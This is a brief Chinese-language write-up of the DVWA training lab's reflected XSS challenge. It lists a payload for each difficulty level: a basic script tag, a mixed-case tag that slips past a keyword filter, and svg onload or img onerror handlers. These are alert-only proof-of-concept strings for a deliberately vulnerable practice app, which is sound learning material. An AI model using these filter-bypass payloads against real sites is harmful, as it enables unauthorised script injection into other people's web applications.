一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
iOS技术狂热者9 小时前
多图超详细安装flutter&Android Studio开发环境,并配置插件盛满暮色 风止何安12 小时前
VLAN的高级特性故事与他64514 小时前
电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞SecPulse1 天前
流影---开源网络流量分析平台(四)(分析引擎部署)浩浩测试一下1 天前
网络安全之超强Linux信息收集:渗透测试与应急响应的基石(命令超强集合工作手册)SuperherRo1 天前
Web开发-JS应用&VueJS框架&Vite构建&启动打包&渲染XSS&源码泄露&代码审计金丝猴也是猿1 天前
手机硬件检测详解:从版本信息到相机功能的全面指南iOS技术狂热者1 天前
wireshark开启对https密文抓包